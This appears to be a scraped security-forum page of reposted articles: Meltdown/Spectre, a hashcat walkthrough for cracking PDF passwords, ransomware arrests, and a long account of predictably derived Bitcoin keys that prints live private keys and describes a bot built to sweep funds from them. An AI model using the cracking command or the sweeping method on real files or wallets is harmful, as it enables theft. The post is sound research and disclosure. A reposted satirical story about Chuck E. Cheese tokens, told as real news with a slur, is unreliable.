The Project Zero researcher, Jann Horn, demonstrated that malicious actors could take advantage of speculative execution to read system memory that should have been inaccessible. For example, an unauthorized party may read sensitive information in the system’s memory such as passwords, encryption keys, or sensitive information open in applications. Testing also showed that an attack running on one virtual machine was able to access the physical memory of the host machine, and through that, gain read-access to the memory of a different virtual machine on the same host. These vulnerabilities affect many CPUs, including those from AMD, ARM, and Intel, as well as the devices and operating systems running on them. Sursa: https://security.googleblog.com/2018/01/todays-cpu-vulnerability-what-you-need.html What are Meltdown and Spectre Google described the two attacks as follows: Meltdown breaks the most fundamental isolation between user applications and the operating system. This attack allows a program to access the memory, and thus also the secrets, of other programs and the operating system. Google says it chose the Meltdown codename because "the bug basically melts security boundaries which are normally enforced by the hardware." Spectre breaks the isolation between different applications. It allows an attacker to trick error-free programs, which follow best practices, into leaking their secrets. In fact, the safety checks of said best practices actually increase the attack surface and may make applications more susceptible to Spectre. "The name is based on the root cause, speculative execution. As it is not easy to fix, it will haunt us for quite some time," Google says. "Spectre is harder to exploit than Meltdown, but it is also harder to mitigate." sursa: https://www.bleepingcomputer.com/news/security/google-almost-all-cpus-since-1995-vulnerable-to-meltdown-and-spectre-flaws/ Sursa: https://danielmiessler.com/blog/simple-explanation-difference-meltdown-spectre/
-
In this series of blog posts, I’ll explain how I decrypted the encrypted PDFs shared by John August (John wanted to know how easy it is to crack encrypted PDFs, and started a challenge). Here is how I decrypted the “easy” PDF (encryption_test). From John’s blog post, I know the password is random and short. So first, let’s check out how the PDF is encrypted. pdfid.py confirms the PDF is encrypted (name /Encrypt): pdf-parser.py can tell us more: The encryption info is in object 26: From this I can conclude that the standard encryption filter was used. This encryption method uses a 40-bit key (usually indicated by a dictionary entry: /Length 40, but this is missing here). PDFs can be encrypted for confidentiality (requiring a so-called user password /U) or for DRM (using a so-called owner password /O). PDFs encrypted with a user password can only be opened by providing this password. PDFs encrypted with a owner password can be opened without providing a password, but some restrictions will apply (for example, printing could be disabled). QPDF can be used to determine if the PDF is protected with a user password or an owner password: This output (invalid password) tells us the PDF document is encrypted with a user password. I’ve written some blog posts about decrypting PDFs, but because we need to perform a brute-force attack here (it’s a short random password), this time I’m going to use hashcat to crack the password. First we need to extract the hash to crack from the PDF. I’m using pdf2john.py to do this. Remark that John the Ripper (Jumbo version) is now using pdf2john.pl (a Perl program), because there were some issues with the Python program (pdf2john.py). For example, it would not properly generate a hash for 40-bit keys when the /Length name was not specified (like is the case here). However, I use a patched version of pdf2john.py that properly handles default 40-bit keys. Here’s how we extract the hash: This format is suitable for John the Ripper, but not for hashcat. For hashcat, just the hash is needed (field 2), and no other fields. Let’s extract field 2 (you can use awk instead of csv-cut.py): I’m storing the output in file “encryption_test – CONFIDENTIAL.hash”. And now we can finally use hashcat. This is the command I’m using: hashcat-4.0.0\hashcat64.exe --potfile-path=encryption_test.pot -m 10400 -a 3 -i "encryption_test - CONFIDENTIAL.hash" ?a?a?a?a?a?a I’m using the following options: –potfile-path=encryption_test.pot : I prefer using a dedicated pot file, but this is optional -m 10400 : this hash mode is suitable to crack the password used for 40-bit PDF encryption -a 3 : I perform a brute force attack (since it’s a random password) ?a?a?a?a?a?a : I’m providing a mask for 6 alphanumeric characters (I want to brute-force passwords up to 6 alphanumeric characters, I’m assuming when John mentions a short password, it’s not longer than 6 characters) -i : this incremental option makes that the set of generated password is not only 6 characters long, but also 1, 2, 3, 4 and 5 characters long And here is the result: The recovered password is 1806. We can confirm this with QPDF: Conclusion: PDFs protected with a 4 character user password using 40-bit encryption can be cracked in a couple of seconds using free, open-source tools. FYI, I used the following GPU: GeForce GTX 980M, 2048/8192 MB allocatable, 12MCU Update: this is the complete blog post series: Cracking Encrypted PDFs – Part 1: cracking the password of a PDF and decrypting it (what you are reading now) Cracking Encrypted PDFs – Part 2: cracking the encryption key of a PDF Cracking Encrypted PDFs – Part 3: decrypting a PDF with its encryption key Cracking Encrypted PDFs – Conclusion: don’t use 40-bit keys Sursa: https://blog.didierstevens.com/2017/12/26/cracking-encrypted-pdfs-part-1/
- 1 reply
-
- 5
-
This course looks at web users from a few different perspectives. First, we look at identifying techniques to determine web user identities from a server perspective. Second, we will look at obfuscating techniques from a user whom seeks to be anonymous. Finally, we look at forensic techniques, which, when given a hard drive or similar media, we identify users who accessed that server. Slides: http://opensecuritytraining.info/WebIdentity_files/WebIdentity_all_slides_pptx_1.zip HD video: Sursa: http://opensecuritytraining.info/WebIdentity.html
-
- 6
-
During the last week, Romanian authorities have arrested three individuals who are suspected of infecting computer systems by spreading the CTB-Locker (Curve-Tor-Bitcoin Locker) malware - a form of file-encrypting ransomware. Two other suspects from the same criminal group were arrested in Bucharest in a parallel ransomware investigation linked to the US. During this law enforcement operation called "Bakovia", six houses were searched in Romania as a result of a joint investigation carried out by the Romanian Police (Service for Combating Cybercrime), the Romanian and Dutch public prosecutor’s office, the Dutch National Police (NHTCU), the UK’s National Crime Agency, the US FBI with the support of Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT). As a result of the searches in Romania, investigators seized a significant amount of hard drives, laptops, external storage devices, cryptocurrency mining devices and numerous documents. The criminal group is being prosecuted for unauthorised computer access, serious hindering of a computer system, misuse of devices with the intent of committing cybercrimes and blackmail. In early 2017, the Romanian authorities received detailed information from the Dutch High Tech Crime Unit and other authorities that a group of Romanian nationals were involved in sending spam messages. This spam was specifically drafted to look like it was sent from well-known companies in countries like Italy, the Netherlands and the UK. The intention of the spam messages was to infect computer systems and encrypt their data with the CTB-Locker ransomware aka Critroni. Each email had an attachment, often in the form of an archived invoice, which contained a malicious file. Once this attachment was opened on a Windows system, the malware encrypted files on the infected device. CTB-Locker was first detected in 2014 and was one of the first ransomware variants to use Tor to hide its command and control infrastructure. It targets almost all versions of Windows, including XP, Vista, 7 and 8. Once infected, all documents, photos, music, videos, etc. on the device are encrypted asymmetrically, which makes it very difficult to decrypt the files without the private key in possession of the criminals, which might be released when victims pay the ransom. As a result of the law enforcement activities, more than 170 victims from several European countries have been identified to date; all filed complaints and provided evidence that will help with the prosecution of the suspects. Watch video> Cerber ransomware in United States In addition to the spread of CTB-Locker, two people within the same Romanian criminal group are also suspected of distributing the Cerber ransomware. They were suspected of contaminating a large number of computer systems in the United States. The United States Secret Service has subsequently started an investigation into the Cerber ransomware infections. Initially, the CTB-Locker investigation was separate from the Cerber investigation. However, the two were joined when it turned out that the same Romanian group was behind both these attacks. At the time of the actions on CTB-Locker, the two suspects of the Cerber investigation had not yet been located. After the US authorities issued an international arrest warrant for the two suspects, they were arrested the day after in Bucharest while trying to leave the country. Crime-as-a-Service This case illustrates the Crime-as-a-Service (CaaS) model, as the services were offered to any criminal online. The investigation in this case revealed that the suspects did not develop the malware themselves, but acquired it from specific developers before launching various infection campaigns of their own, having to pay in return around 30% of the profit. This modus operandi is called an affiliation program and is "Ransomware-as-a-service", representing a form of cybercrime used by criminals mainly on the Dark Web, where criminal tools and services like ransomware are made available by criminals to people with little knowledge of cyber matters, circumventing the need for expert technological skills. Europol supported the investigation by hosting operational meetings, drafting digital forensic and malware analysis reports, collating intelligence and providing analytical support. The participating countries worked together in the framework of the EMPACT project targeting cyber-attacks that affect critical infrastructure and information systems in the EU. On the action day, forensic support was provided during the house searches with the intention of analysing data extracted from electronic devices and providing immediate results. Never pay the ransom Ransomware attacks are relatively easy to prevent if you maintain proper digital hygiene. This includes regularly backing up the data stored on your computer, keeping your systems up to date and installing robust antivirus software. Also, never open an attachment received from someone you don’t know or any odd looking link or email sent by a friend on social media, a company, online gaming partner, etc. If you do get infected, we advise you not to pay the requested ransom. It will not get you your files back and you will be funding criminal activity. We recommend you always report the infection to your national police authorities, as this will enable law enforcement to better tackle the criminal groups behind it. More prevention advice is available on www.nomoreransom.org. Sursa: https://www.europol.europa.eu/newsroom/news/five-arrested-for-spreading-ransomware-throughout-europe-and-us
-
NEW YORK CITY – A New York man has been arrested after he reportedly made over a million dollars selling Chuck E. Cheese tokens as Bitcoins on the streets. Marlon Jensen, 36, was arrested a Sunday morning when NYPD stormed his home. NYPD received calls from the fraud victims that someone had sold them “Bitcoins”, only to find out there actually was no tangible bitcoin currency available. NYPD found $1.1 Million of cash inside Marlons home. According to police, Marlon had scratched off most of the Chuck E. Cheese engravements on the coins, and would write “B” on each coin with permanent marker. As many should know already, Bitcoin is a crypto currency and payment system that has recently received unprecedented popularity and value, with each bitcoin currently worth $18,950 USD. Although Bitcoin isn’t actually a tangible form of currency, that hasn’t stopped some people from successfully selling “bitcoins” to people using irrelevant gold coins, in this case Chuck E. Cheese Tokens. “People are retarded haha”, said NYPD Officer Michael West, “My 8 year old son would know those weren’t bitcoins and lord knows he’s not the brightest”. Marlon is currently being charged with fraud and can face up to 5 years in federal prison. Sursa: https://www.huzlers.com/bitcoin-scam-man-arrested-after-making-over-1-million-selling-chuck-e-cheese-tokens-as-bitcoins/
-
Story Save and access docs and photos and music on your own local Pi Cloud server! The best part: you can use it if, or when, the Internet goes down (or if you're in a remote spot & want access to Wikipedia). Oh hey, and if your friend gets one and they live close (*ahem*80ft*ahem*), you can share stuff with them and make your own personal chat line! If enough folks built Pi Cloud servers, we could crowdsource the Internet! That would be an 11/10 on a scale of greatness. With the new models of the Raspberry Pi computer, it's possible and not even expensive! (What! Tell me more!) This tutorial will show you how to set up a short-range (~ 80 ft) WiFi Access Point and a personal web server ('bringin it back to HTML bbies). You can set this up as a (closed) local network only (i.e. your own personal "cloud" backup device), or broadcast it to the rest of the world! (..if you do this be sure you know network security.) That said, assuming you have a basic knowledge of the Pi, here's the breakdown: Read Time: ~ 40 min Build Time: ~ 60 min (less if you are experienced w/ Linux) Cost: ~ $35 (for the Pi 3) Link: https://www.hackster.io/jenfoxb0t/make-your-pi-a-local-cloud-server-c4f3f1
-
- 3
-
-
NU am citit tot articolul, motiv pentru care topicul e la offtopic, daca cineva are rabdare sa citeasca si informatiile presentate i se par credibile sa lase un comentariu si voi muta topicul ----------- Hi. Thanks for passing this along so it gets some attention. I was worried if I posted this somewhere it would mostly go unnoticed. Also, I'm trying to stay anonymous because I don't want to be accused of being the person who came up with this exploit or be blamed by any company for any damages. It's an interesting technical story so I thought I would share it. -------- story begins here ---------------- I returned 9 BTC to reddit user fitwear who recently claimed were stolen from their blockchain.info wallet. I have evidence that some bitcoin address generation code in the wild is using private keys that can easily be discovered on a regular basis. This is either intentional or by mistake. Some wallets have been compromised by what is probably an innocent looking piece of code. Furthermore, someone has been siphoning bitcoin on a regular basis since 2014 from them. Whether they discovered this by accident (like I did) or are the ones who installed the code themselves, I don't know. It looks like either a clever exploit or a coding error. It could also be yet another piece of malware, however as I explain below, I feel this is less likely the case. In order to fully understand how this works and how I discovered it, please read on. Some Background --------------- I've been following bitcoin since I first heard of it in 2011. One of the things that fascinated me was the ability for someone to create private keys from just about anything using Sha256 (i.e. Sha256(password/phrase)). This, of course, is NOT a recommended way of obtaining a private key since if YOU can think of the word/phrase, someone else can too and the likelihood of your bitcoins being stolen is quite high. The most secure private keys are generated randomly. The probability of someone else being able to generate the same sequence of 32 random bytes is so close to 0, it is highly improbable anyone ever will (given the expected lifespan of the universe). If you peer into the blockchain, you will find that people have 'played' with the chain by sending small amounts of bitcoins to addresses corresponding to private keys generated using Sha256. For example, Sha256 of each word in the entire /usr/dict/words file found on most UNIX systems has had a small amount sent to it. There was a site called brainwallet.org that made it easy for you to convert a phrase into a private key + public address. (The code is still available on GitHub but has since been removed from the Internet). Try using phrases like "i find your lack of faith disturbing", "these aren't the droids you're looking for" or "satoshi nakamoto" as inputs to Sha256. You'll find the addresses corresponding to those private keys have had small amounts sent to them (and transferred out). It's quite obvious these were _meant_ to be found. It turns out there are a lot of these addresses. (Keep looking and you will easily find some.) This is nothing new and has been known to the bitcoin community for a while. I always had the idea in the back of my mind to try and find other non-trivial examples of 'discoverable' private keys. That is, something beyond Sha256(word/phrase). So I decided to try and hunt for buried bitcoin treasure. Perhaps I could find some bitcoin intentionally hidden by someone that hadn't yet been discovered? In the first couple weeks of June 2017, I finally devoted some time to the task. I honestly didn't expect to find much but I was amazed at what I ended up discovering. I began by writing a program to scan every block in the blockchain and record every public address that had ever been used. (Note: I didn't only store addresses for which the balance was greather than zero, I stored ALL of them which is why I believe I ended up accidentally discovering what I did.) There were only about 290 million at the time so this wasn't a big deal. The Experiments --------------- What follows is a description of my experiments and what led me to discover what I believe is either a scam or really bad coding error. Experiment 1 ------------ My first experiment was to see if anyone used a block hash as a private key. That would actually be a nifty way to 'compress' 32 bytes in your head. You would only have to remember the block height (which is only maybe 6 digits) and the corresponding larger 32 byte number would be saved for all time in the chain itself! Results: Success! I found 46 addresses that had some amount of bitcoin sent to them between 2009 and 2016. As expected, these all had 0 balances either because the owner had taken them back or they were discovered by someone else. Here are two examples. You can use blockchain.info to see these hex values are actually block hashes from early in the chain. This happened on/off up until mid-2016. 1Buc1aRXCqdh6r7PRYWPAy3EtVFw5Ue5dk 000000006a625f06636b8bb6ac7b960a8d03705d1ace08b1a19da3fdcc99ddbd 1KLZnkqU94ZKpgtcWCRs1mhqtF23jTLMgr 000000004ebadb55ee9096c9a2f8880e09da59c0d68b1c228da88e48844a1485 Nothing really alarming so far. Experiment 2 ------------ Similar to my first experiment, I then searched for addresses that were generated from the merkle root used as a private key. (BTW, I searched for both compressed/uncompressed keys, so each 32 bytes resulted in two address look-ups from my database). Results: Yes! I found 6 addresses again up until mid-2016. Even though every address I found had a 0 balance (again expected), I was having fun with my success! Example: 13bkBdHRovsBkjM4BUsbcDNr9DCTDcpy9W 6c951c460a4cfe5483863adacafad59e5de7e55876a21857733ca94049d7d10c Similar to merkle root and block hashes, transaction ids (hashes) also seem to have been used as private keys. Still nothing alarming to me thus far. Experiment 3 ------------ I wondered at this point if anyone might have used repeated Sha256 on words. Why stop at just one iteration when you can easily do one million? Also, it becomes less likely to be discovered the more iterations you do. I found a bunch. Here are a few: Sha256('sender') x 2 18aMGf2AxQ3YXyNv9sKxiHYCXcBJeJv9d1 098f6d68ce86adb2d8ba672a06227f7d177baca3568092e4cda159acca5eb0c7 Sha256('receiver') x 2 1C3m5mFx6SjBCpw6qLqzM8izZArVYQ9B5u 6681b4b6aa44318e55a724d7135ff23d76eb75847802cd7d220ecaa8427b91d4 Sha256('hello') x 4 17UZ4iVkmNvKF9K2GWrGyMykX2iuAYbe1X 28b47e9b141279ea00333890e3e3f20652bbd7abc2b66c62c5824d4d6fe50ac9 Sha256('hello') x 65536 1Mi5mVANRNAetbJ21u2hzs28qCJC19VcXY 52fa8b1d9fbb264d53e966809ce550c3ab033248498da5ac0c5ab314ab45198e Sha256('password') x 1975 (This one's my favorite, someone's birth year?) 13mcYPDDktHdjdq9LwchhU5AqkRB1FD6JE 6e8cdae20bef63d33cb6d5f1c6c9c954f3148bfc88ef0aa1b51fd8b12fa9b41c People were obviously burying bitcoin in the chain. Whether they expected the coins to be taken or not, we'll never know. But these methods were still highly 'discoverable' in my opinion. Experiment 4 ------------ My last experiment is the one that led me to believe someone was siphoning bitcoin from some service on a regular basis and has been since 2014. Take a look at this private key: KyTxSACvHPPDWnuE9cVi86kDgs59UFyVwx2Y3LPpAs88TqEdCKvb The public address is: 13JNB8GtymAPaqAoxRZrN2EgmzZLCkbPsh The raw bytes for the private key look like this: 4300d94bef2ee84bd9d0781398fd96daf98e419e403adc41957fb679dfa1facd Looks random enough. However, these bytes are actually sha256 of this public address! 1LGUyTbp7nbqp8NQy2tkc3QEjy7CWwdAJj I discovered this by performing Sha256 on all the public addresses I had collected from the setup of my experiments and then seeing if those addresses (from the generated private keys) were ever used. Bingo! Lots were coming up. I searched a fraction of the chain and found dozens. I also found these addresses had bitcoin sent to them very recently (within weeks/days of when I discovered them.) I asked myself, "Why would someone do this?" At first, I thought this was someone who thought they could get away with having to remember only one piece of information rather than two. Maybe they have one favorite address/private key combo and derived another from that one? I thought it was possible. You could keep doing this in a chain and derive as many as you wanted and only ever have to remember the first one. But I ruled this out for one simple reason; bitcoins transferred into those addresses were being transferred out within minutes or SECONDS. If someone generated these private keys for themselves, then why would the coins be almost immediately transferred out in every case I looked at? Here are some more (complete list at end of this doc): 16FKGvEtu5KPMZqiTK4yjmsSZsJLyxz9fr from Sha256(1CRWfJdgVrfKLRS4G3vTMRhEQrCZZyHNMo) 1HwxL1vutUc42ikh3RBnM4v2dVRHPTrTve from Sha256(1FfmbHfnpaZjKFvyi1okTjJJusN455paPH) 1FNF3xfTE53LVLQMvH6qteVqrNzwn2g2H8 from Sha256(1H21ndKEuMqZbeMMCqrYArCdV8WeicGehB) In every case I looked at, the coins were moved away within minutes or seconds. It was much more likely that a bot was waiting for those coins to show up. Also, transactions are STILL happening to this day on those addresses! But how can that bot know in advance that address was about to receive bitcoins? A Scam or a mistake? -------------------- It is at this point I formed a theory on what was really happening. It is likely that someone installed malicious code into the backend system of a mining pool, an exchange, or possibly wallet generation code. They are using public information so that they can discover the private keys easily and steal the coins on the side. But why would they use Sha256(public_address)? Why not do Sha256(public_address + some super hard to guess random sequence) or just use a hard-coded address? Well, I have a theory on that too. It can't be hard-coded or it would look suspicious in a source code repository. It's likely the code was introduced by someone who works (or worked) for some company connected to bitcoin (exchange/mining pool/gambling site/wallet). Code submitted by developers into source control systems usually goes through a code review process. It would be much easier to hide an innocent looking Sha256 operation inside the millions of lines of code that make up the backend. Sha256 is used all over the place in bitcoin and it wouldn't look suspicious. The function would be readily available. However, if code were to be submitted that performed Sha256(address + "secret_password1234xyz"), that would look VERY suspicious. My guess is someone has slipped in a routine that LOOKS harmless but is actually diverting bitcoin to their awaiting bot ready to gobble them up. It's actually quite clever. No one can know the destination address in advance. You would have to keep performing Sha256 on all public addresses ever used to catch that one in a million transaction. Someone would be able to capture those coins by simply watching for a transaction into an address that corresponds to a private key generated from Sha256 of one of the existing public addresses. Keeping such a database is trivial and lookups are quick. To be fair, I suppose this could be a coding error. Anything is possible with a buffer overflow. I would love to see the code if this is ever found. Transactions were STILL happening right up until a couple weeks before I made this discovery! So I wrote a bot to try and 'catch' a transaction. Mind Blown ---------- Within the FIRST 48 HOURS of my bot going live, on Jun 19, a whopping 9.5 BTC was transferred into an address for which I had the private key. This was approximately worth $23,000 USD at the time. I was shocked. This is the address: 12fcWddtXyxrnxUn6UdmqCbSaVsaYKvHQp The private key is: KzfWTS3FvYWnSnWhncr6CwwfPmuHr1UFqgq6sFkGHf1zc49NirkC whose raw bytes are derived from Sha256 of: 16SH69WgJCXYXWV58sxjTxonhgBh5HCZTt (which appears to be some random address previously used in the chain) BUT... I had failed to test my program sufficiently and it failed to submit the transaction! The 9.5 BTC was sitting there for almost 15 minutes before being swept away by someone else. I honestly didn't think the first amount to cross my radar would be so high. The other samples I found from past transactions were for tiny amounts. It is quite possible that whoever moved them later out of the poisoned address actually owned them. Maybe someone else's sweeper bot only takes small amounts most of the time to avoid attention? At this point, I was pretty confident I was on to something not yet discovered by anyone else. I _could_ have taken those 9.5 BTC and if this was known to others. Also, if you look into the history of that account, 12 BTC was transferred into it (and out right away) only one month earlier. No one has claimed any theft (to my knowledge) involving that address. I fixed my program (actually tested it properly this time) and let it run again. My program detected more transactions (2 within the next 48 hours). I coded my bot to ignore anything less than .1 BTC so I didn't move them. I didn't want to tip off the anyone that I knew what they were doing (if that was indeed the case). Another 3-4 days passed and the next hit my bot detected was for roughly .03 BTC (~$95USD). For some reason, this was not transferred out immediately like the rest. By this time it was July 4th weekend. I let this one sit too and it took a full 7 days before it was moved (not by me). It may have been the legitimate owner or a bot. We'll never know. The destination address was: 1LUqqMzaigWJTzaP79oxsD6zKGifokrh7p The private key raw bytes were: c193edeeb4e7fb5c3e01c3aebd2ec5ac13f349a5a78ca4112ab6a4cbf8e35404 The plot thickens... -------------------- I didn't realize it at the time but that last transfer was into an address for a private key not generated from another public address like the first one. Instead, this address was generated from a transaction id! I had forgotten that I seeded my database with private keys generated with transaction ids as part of one of my earlier experiments. I didn't label them so I didn't know which were from Sha256(pub address) and which were from transaction ids. I found some hits at the time but when I checked the balances for those accounts, they were all zero and I didn't think anything of it. But now my database was detecting ongoing transfers into THOSE addresses (transacton id based) too! Okay, someone was possibly using information from the blockchain itself to ensure private keys were discoverable for the addresses they were funelling bitcoin into. The interesting thing is I found a link between the 12fcWddtXyxrnxUn6UdmqCbSaVsaYKvHQp address (via sha of a public address) AND the 1LUqqMzaigWJTzaP79oxsD6zKGifokrh7p transfer (via the tx id as a key). In the history of both of these addresses, you can see the BTC eventually ended up into this address: 1JCuJXsP6PaVrGBk3uv7DecRC27GGkwFwE Also, the transaction id was for the previous transaction to the one that put the BTC in the toxic (discoverable) address in the first place. Now it became even more clear. The malicious code sometimes used a recent transaction id as the private key for the doomed destination address. Follow the .03 BTC back and you will see what I mean, you eventually get to the txid = private key for that discoverable address. The 1JCuJXsP6PaVrGBk3uv7DecRC27GGkwFwE address is ONE of the collection addresses. I have reason to believe there have been many over the years. This one only goes back to approximately March 2017. You can see in the history of this one address when they consolidated their ill-gotten gains into one transaction back to themselves. I let my bot run longer. The next hit I got was for block hashes that were used as private keys (see Experiment #1). Sure enough, this address also had links to the 1JCuJXsP6PaVrGBk3uv7DecRC27GGkwFwE collection address! And remember my merkle root experiment? I believe those were also part of this. However, I have not linked those to this one particular collection address yet. In the end, I found a total of four different 'discoverable' private key methods being used. I made sure my database was filled with every block hash, merkle root, transaction id and Sha256(public address) for private keys and let my bot run. Transactions for all four types were showing up, again for tiny amounts which I ignored. By this time, I was watching BTC getting taken in small amounts regularly. Sometimes, I saw as many as 6 transactions fly by in one day. How fitwear lost (and got back) 9 BTC ------------------------------------- On Nov 12, my program saw 9 BTC transferred into an address that my database had the private key for. I had searched for that address too to see if anyone was claiming ownership but I didn't see anything. I decided to send a small amount to a well known puzzle address to give the transaction some public scrutiny in an anonymous way (1FLAMEN6, I'm still trying to solve this BTW). Shortly after, I became aware of fitwear's reddit post claiming theft after someone noticed the prize amount had been topped off and linked the two events together. I contacted fitwear privately and returned their coins minus the small amount I sent to the puzzle address. Blockchain.info's original response to his support ticket, was that his system must have been compromised. However, if you read his post, he took every precaution including typing in the key for his paper wallet instead of copy/paste and using 2FA. In his case, in Aug 2017, he imported the private key for his 1Ca15MELG5DzYpUgeXkkJ2Lt7iMa17SwAo paper wallet address into blockchain.info and submitted a test transaction. At some point between then and Nov 12, the compromised 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit got into his online wallet as an 'imported' address. Together, we contacted blockchain.info and I relayed the information I just outlined above to them. Their security team investigated but found no evidence it was their system that was at fault. I suppose it's possible his system was somehow compromised back in August and managed to import a key into blockchain.info without him knowing it. Or someone else logged into his account, imported the key, then waited. I feel the malware/login explanations are much less likely because it looks like code attempting to 'hide in plain sight' to me. You wouldn't need to use Sha256(address) or block hash or txid or merkleroot if you were malware or an unauthorized login. You would at least salt or obscure the key with some bit of knowledge only you know so that only you could derive the private key (as mentioned earlier). The fact that information from the blockchain itself is being used indicates it may be some transaction processing logic. Also, fitwear took extreme precautions (you can read his reddit post for details). The origin of these poison destination addresses remains a mystery. If it's the case that some wallet generation code is doing this, then it may be the case that we're seeing 'change' transactions. When you create a wallet, there maybe 20 addresses generated. They are all supposed to be random keys. If this rogue code creates one of them in this manner (based on the public address string of an earlier one), then at some point, your 'change' will get put back into it as the wallet 'round-robins' through the list. fitwear's 15Z address sat unused until Nov 12 when fitwear transferred his 9 BTC into it using blockchain.info. To see the connection, take a look at this: echo -n "1Ca15MELG5DzYpUgeXkkJ2Lt7iMa17SwAo" | sha256sum 9e027d0086bdb83372f6040765442bbedd35b96e1c861acce5e22e1c4987cd60 That hex number is the private key for 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit !!! fitwear insists he did not import the key for that address. Did Blockchain.info generate it or was it added by mallicious browser code? We may never know. See below for the complete list of other Sha256 based addresses that suffer from the same issue. I believe this is happening for others. It's likely, that the small amounts usually taken are going unnoticed by the owners. What does this mean for bitcoin? Nothing probably. I believe the bitcoin network itself to be secure. However, as long as humans are involved in the services that surround it (mining pools, exchanges, online/mobile wallets) there is always a chance for fraud or error. The bitcoin network itself may be 'trustless', but anything humans touch around its peripheries is certainly not. And you need to use those services to get in/out of the network. So even with bitcoin, it still boils down to trust. To be fair to blockchain.info, only Sha256(public address) (one in particular) was found to be present in one of their wallets. The other 3 methods I described above could be completely unrelated. And they could all possibly be a (really weird) software bug. Here are 100+ addresses that received bitcoins whose private keys are the bytes resulting from Sha256 of another public address. Most of these came from a scan I did of old transactions, not while my bot was running. Blockchain.info told me they do not appear to have been generated by their system. Also, the list of addresses I"m providing are only the subset that have already had some BTC transacted through them. There are likely hundreds more lying dormant inside people's wallets that have not been used yet. Here is the list: 1G2rM4DVncEPJZwz1ubkX6hMzg5dQYxw7b Sha256(1PoHkMExsXDDBxpAwWhzkrM8fabmcPt6f4) 1Kap8hRf8G71kmnE9WKSBp5cJehvTEMVvD Sha256(1LdgEzW8WhkvBxDBQHdvNtbbvdVYbBB2F1) 1LsFFH9yPMgzSzar23Z1XM2ETHyVDGoqd5 Sha256(1FDWY63R3M87KkW2CBWrdDa4h8cZCiov9p) 13eYNM5EpdJS7EeuDefQZmqaokw21re4Ci Sha256(1E7kRki9kJUMYGaNjpvP7FvCmTcQSih7ii) 1CcSiLzGxXopBeXpoNSchagheK9XR61Daz Sha256(191XapdsjZJjReJUbQiWAH3ZVyLcxtcc1Y) 1J9Gtk5i6xHM5XZxQsBn9qdpogznNDhqQD Sha256(16fawJbgd3hgn1vbCb66o8Hx4rn8fWzFfG) 1A17F9NjArUGhkkiATyq4p8hVVEh2GrVah Sha256(1Je3tz5caVsqyjmGgGQV1D59qsCcQYFxAW) 1GGFXUL1GoHcEfVmmQ97getLvnv6eF98Uu Sha256(1DCfq8siEF698EngecE69GxaCqDmQ2dqvq) 14XxBoGgaJd1RcV3TP8M4qeKKFL9yUcef1 Sha256(1Frj1ADstynCYGethjKhDpgjFoKGFsm5w5) 18VZKyyjNR8pZCsdshgto2F1XWCznxs86P Sha256(1FEwM9bq3BnmPLWw5vn162aBKjoYYBfyyi) 12fcWddtXyxrnxUn6UdmqCbSaVsaYKvHQp Sha256(16SH69WgJCXYXWV58sxjTxonhgBh5HCZTt) 19T6HNnmMqEcnSZBVb1BNA6PrAKd5P2qZg Sha256(1Frj1ADstynCYGethjKhDpgjFoKGFsm5w5) 1MWBsFxWJrNtK2cN2Vt7j3a9r5ubfn41nx Sha256(16era4SgYEcbZD1pu6oCBXGXjK2wSrePe8) 1Ns55SngRhshA8kEnyuQ9ELZZPN7ubYfQJ Sha256(1NiNja1bUmhSoTXozBRBEtR8LeF9TGbZBN) 13CnacdjvuuTJkCWrZf33yMrQh5aVX5B14 Sha256(1KPDwnrzJAfD2V4oiPf55WBTAi6UJDvMjN) 1MG1dTqtWVNqq3Qht88Jrie7SXp2ZVkQit Sha256(1UvM3rBJ8Sa1anQ8Du1mj5QZapFmWF7vH) 1DBXjdbMWXmgt81E1W7AYRANVPiq12LsGd Sha256(1Poi5SE42WVR2GKPrwp9U3wYqEBLN6ZV1c) 1GUgTVeSFd2L5zQvpYdQNhPBJPi8cN3i4u Sha256(1EjWVhiTyCdpTa29JJxAVLq27wP4qbtTVY) 1JQ2shEPzkd3ZL3ZQx7gmmxFLvyhSg14cb Sha256(1KEkEmadjTYHCiqhSfourDXavUxaiwoX7f) 125PcPD4QXzgDwNPForSFji8PPZVDr2xkp Sha256(1GRdTKgSq5sY3B4PiALPjKTXSXPXs6Ak7X) 1kN83e7WRtsXD7nHn51fwdEAi51qk5dEe Sha256(1JcsBzKio1curbu9AtxTySxddvT4MKT3Da) 1L5pzdXL4hhtMHNxFXHjjdhhSidY9kJVRk Sha256(1V8tWZw4J3G5kBgafGsfoVSNQEgkxDmeA) 1cQH5XCsezkKt9zpwjHizz8YJZudDSwri Sha256(1AYKSUqCtDX1E34q4YoFnjwWSj41huWgGG) 1DHWP6UjSKBBUR8WzTviWAGNgLfDc6V6iL Sha256(1MbzspFCdXjtqAUx3t6A11vzrk5c847mvE) 1EqSvLnMhbRoqZkYBPapYmUjMS9954wZNR Sha256(1XAeTJCaYJgoBDwqC1rhPhu3oXiKuMs9C) 1MJKz1M7dEQCHPdV5zrLSQPa4BGFAuNJyP Sha256(1BxzenHnSuKwqANALE5THeTCSRZkv3ReRP) 18VZG5Dr8bYJWadHUgh7kC4RPS1VsvH4Ks Sha256(1qA59Na3WysruJbCPoomryDRCtJ4f4aLu) 1CoyRECWJ4LHNiZAgAz9719chFkrDJuNMC Sha256(19o4Yjrd74qnZ3z87C67BShbbF4fSNHy8W) 1ERKXYeaCy97KPdJTRbWjJDVzMbStJYqCm Sha256(1DMwZeQJXfWToRRHr5uRiKeucwDWkWLvkm) 1mbcQaPzsaBoaYP4V6uwCA74BRPhroK3r Sha256(1KzSULbG3fRVjWrpVNLpoB6J62xYL42AdN) 1gHad7cKWDcVKFeKcLRW4FhFAyw2R7FQZ Sha256(1LFCEek8FobJRXb5YrzWJ6M2y8Tx2Xg3NB) 1DvtF6X5b9cBrMZa4Yff9tARCLqP5ZyB47 Sha256(14nuZCWe76kWigUKAjFxyJLFHQyLTsKXYk) 1LzGrd5QX1rG5fk7143ps9isUTEwGyzRJE Sha256(19cMyj9KqVq78yZe32CNhgpyuGLMwM9X8S) 153jMRXn251WyxT9nmJW2XDsFUJ648jyY5 Sha256(1PF2gQPPAwQDfTrSuNX6t8J381D7s3bGFu) 1EFBsAdysTf81k72v9Zqsj3NMuo6KoWD2r Sha256(1BBBvd9G5YThYVVMSGSxJzQvQiQm3WxJC2) 14mRxKmeEw9DCBbpR596FYmfZVdBD8MJxh Sha256(1PLpQDyqDUcpK6fWpRhkkFVBw4tSK4sHkS) 